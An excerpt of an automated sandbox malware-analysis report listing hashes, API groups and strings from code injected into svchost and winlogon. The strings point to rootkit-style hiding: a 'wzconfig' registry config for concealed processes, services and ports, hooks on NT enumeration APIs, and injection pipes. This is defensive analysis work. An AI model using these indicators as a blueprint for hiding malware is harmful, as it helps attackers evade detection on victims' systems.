                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1451E2323526008FEF18CF55E44CBADB792F764B98F568125EB4A87788DB79C949C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3163161869-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: 4a691fc3f30871568cbb659e5ddc4cf54a034a6163590912501f94fe6b11e8bb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D561AF72504BC48AEB708F25E4483DEB7A0F7A5BA8F054215EF9947B99DB7CC198CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction ID: 333fcd61bbf4bc4705204bb4755e8e41bc7211cc0803d2090206793338cfd2e6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE5106322047A189EE25DF29A05C3EE67A2F3A5B80FC64025DE9E03F99DE39D54DC740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction ID: 7adbb29521ce76c1c4d67e17dd5508aaeaefbe1d060ec9816d2b3e566ac1df88
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03419072714A908AEB60DF65E84C3EE67A0F7A8794F824121EE8D87798EB7CC545C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction ID: 5592283a4664d3341b5304dcf7baee73327e261ec94aa728d918a66c94bc1116
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A112832219B8082EF618B15F44829EB7E5F798B94F5A4625EFCD07B68EF3CC5558B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction ID: ad3ebd189bd1ce3a754ad231f4adb9a8daf251f527b4edceabcd72025bdb08a4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5118F35A01B5489EE05DF66B40C2AD67A1FBD9FC1F5A4024DE4D43765EE38C446C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction ID: ca825b209141a05a67d147eb67ff52e222250f1688b920899263023ae9d1fecd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49E0ED756116048AEB049F62E81C39E7AE1FBD9F56F46C024C98907351DF7DC499C750

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:1.5%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:95.1%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:123
                                                                                                                                                                                                                                                Total number of Limit Nodes:16

Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\wzconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-440640706
• Opcode ID: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
• Instruction ID: 9ab28105617f9f4d7831693b50e93b4076cf9e458c14d77aa972915aef88bcfd
• Opcode Fuzzy Hash: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
• Instruction Fuzzy Hash: A7711737B51B1986FB119F62E880ED933A4FB85B8DF811111DA4E43B68DF3AC484C396

Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
• Instruction ID: 8ec04587158281d2d9dad587585733f8651462eefbddc6046d8ec44daa99c3b8
• Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
• Instruction Fuzzy Hash: 4D118E37B4574482FF259B52F404AAA72A0FB89F8AF840129DE8903B54EF3EC504C746

Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: bb6e1daf763caff3280ddda97538b795954ea030298127e76771fb68279c5f11
• Instruction ID: 5c05e1e5ecc0651991b550fbc0c94235542ffdcd75a6674f26f374849764ce7f
• Opcode Fuzzy Hash: bb6e1daf763caff3280ddda97538b795954ea030298127e76771fb68279c5f11
• Instruction Fuzzy Hash: 8AD1CB37644B8882FA71DB16E49079AB7A0F788B89F500212EACD477A5DF3DC541CB82

Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: c3d7fdcc31d1e74926da01ee871671d3c0ed7e2ef0909a2a1c762ceeae194f43
• Instruction ID: 9156b42a81309df7a60c261afd2316abbb79b349619a0c02224a01ac2ec13a04
• Opcode Fuzzy Hash: c3d7fdcc31d1e74926da01ee871671d3c0ed7e2ef0909a2a1c762ceeae194f43
• Instruction Fuzzy Hash: 6A021A33649B8886F761CB55F49079AB7A0F7C4789F500015EA8E87BA9DF7DC444CB82

Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Virtual$AllocQuery
• String ID:
• API String ID: 31662377-0
• Opcode ID: 583c9a696cbd2eed1741be8d9dfd6b22d02d31c25e0c094f16caf77a54ebc047
• Instruction ID: 611f96c174db5e12ab381184d84b39c11c659b9b8cc276fc81eacf61a152ff8d
• Opcode Fuzzy Hash: 583c9a696cbd2eed1741be8d9dfd6b22d02d31c25e0c094f16caf77a54ebc047
• Instruction Fuzzy Hash: BA313433A59B4881FB32DA15E05479AB7A0FB84B8EF900515F5CD46B99DF3EC5808B83

Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
• Instruction ID: c82ee47a6ee21ed23934ef6add0532bd6daf23a1234905dce6844197f9e6dc7c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63117C32E9074D82F7629760A809FD97290BF54B0FFC040259446816A2EF3BC44983C3

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: CacheCurrentFlushInstructionProcessProtectVirtual
• String ID:
• API String ID: 3733156554-0
• Opcode ID: 7bd4ffe34fae4658c507964c0034225464d3acd96ef312876d3b1babf7cbfa54
• Instruction ID: da08ccee6737cd7e57eba466047ad7013c8b080749dc1189c21685581aac2f6e
• Opcode Fuzzy Hash: 7bd4ffe34fae4658c507964c0034225464d3acd96ef312876d3b1babf7cbfa54
• Instruction Fuzzy Hash: 2BF01D37658B0880F6329B11E491B8A77A0FB887D9F940111BACD03B69DA3EC1918B82

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
Similarity
• API ID: AllocLibraryLoadVirtual
• String ID:
• API String ID: 3550616410-0
• Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction ID: 7b8c24021299dcb41b8805f87c59f78c8aa839f6b9bd9ac3640d72a9e7300ad4
• Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction Fuzzy Hash: D6610233F417E887EB568F159000BADB392FF44B98F988124DE0D07788DA39D85AC782

Control-flow Graph

APIs
  • Part of subcall function 000001CA7D1E1630: GetProcessHeap.KERNEL32 ref: 000001CA7D1E163B
  • Part of subcall function 000001CA7D1E1630: HeapAlloc.KERNEL32 ref: 000001CA7D1E164A
  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E16BA
  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E16E7
  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1701
  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E1721
  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E173C
  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E175C
  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1777
  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E1797
  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E17B2
  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E17D2
• Sleep.KERNEL32 ref: 000001CA7D1E1ADF
• SleepEx.KERNELBASE ref: 000001CA7D1E1AE5
  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E17ED
  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E180D
  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1828
  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E1848
  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1863
  • Part of subcall function 000001CA7D1E1630: RegOpenKeyExW.ADVAPI32 ref: 000001CA7D1E1883
  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E189E
  • Part of subcall function 000001CA7D1E1630: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A8
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: CloseOpen$HeapSleep$AllocProcess
• String ID:
• API String ID: 1534210851-0
• Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
• Instruction ID: a07f805ffae74e0d63d6fdf8c268cb46fa96c110946ffe678857fd558b38d778
• Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
• Instruction Fuzzy Hash: 51314477A8470941FA529B22D940BED33B5BF44BC9FD940A18E09876D5FE12C8D183E3

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
• Instruction ID: 555bc39b5e6f9ab1c6164b41ac2929c36f064cfbafa2d1fd9315a83b4d649197
• Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
• Instruction Fuzzy Hash: A8B18073A9179881FB6A8F25D410BE973A4FF44B89F94505AEE0953794DE36CC80C3C2
APIs
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction ID: 938f5b669ad8451808081d637da5d7242c60a325c1498bc33c5ba135558a0bfe
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A317077645B8486FB61CF60E840BED7360FB84708F84402ADA8E47B95EF39C648C752
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction ID: 271964bf979d0af30ccaa3c2c3b8d9b5bba9c84c70045a5d429a5ec3e4483d15
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1731A037654B8486FB21CF25E840BDE73A0FB88758F940115EA9D43B99DF39C145CB42

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 2005889112-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction ID: eb6008952899b97b8051d718b82bc20d5bbcb0e0e4275c00c506dc5afe1e136e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D519EB3A45B8886FB11CF62E44879A77A1FB89F89F844124DE4907719DF3DC445C742

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                                                                                • API String ID: 4175298099-1975688563
                                                                                                                                                                                                                                                • Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction ID: 6f307895852f7b786f3821498888c26fba8df4c367dca315da073d0949d63b92
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4731B676986B4EA0FA06EF65E861FE47321BF4435EFC40057940902161AF7BC68AC3D3

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 000001CA7D1ED3A7
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED3BC
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED3DD
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED40A
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED41B
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED42C
                                                                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 000001CA7D1ED447
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED47D
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001CA7D1EF23C,?,?,?,?,000001CA7D1EC50F,?,?,?,?,?,000001CA7D1E7AC0), ref: 000001CA7D1ED49C
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1EDC3C: HeapAlloc.KERNEL32 ref: 000001CA7D1EDC91
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED4C4
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1EDCB4: HeapFree.KERNEL32 ref: 000001CA7D1EDCCA
                                                                                                                                                                                                                                                  • Part of subcall function 000001CA7D1EDCB4: GetLastError.KERNEL32 ref: 000001CA7D1EDCD4
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED4D5
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001CA7D1F0FDB,?,?,?,000001CA7D1F09CC,?,?,?,000001CA7D1ECDBF), ref: 000001CA7D1ED4E6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 570795689-0
                                                                                                                                                                                                                                                • Opcode ID: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction ID: 84a83807c8b1dcbbbab807b3711b196746fe6fff5a948113775e8854d54f3998
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C414A32B8434881FA5BA7215551BE931427F447AEFDC4724A9364A6D7EE2AD40153C3
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                                                                                                                • String ID: \\.\pipe\wzchildproc32$\\.\pipe\wzchildproc64
                                                                                                                                                                                                                                                • API String ID: 2171963597-1908187885
                                                                                                                                                                                                                                                • Opcode ID: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction ID: d1bb669c19779ff73fe20c5d30a7fa6afff5cb1ee8683e7e0b0928f54559d9d6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
• Instruction Fuzzy Hash: C4218333A5474483F711CB24F454B9973A1FB897A9F900215DA5903BA8CF7DC549CF42

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
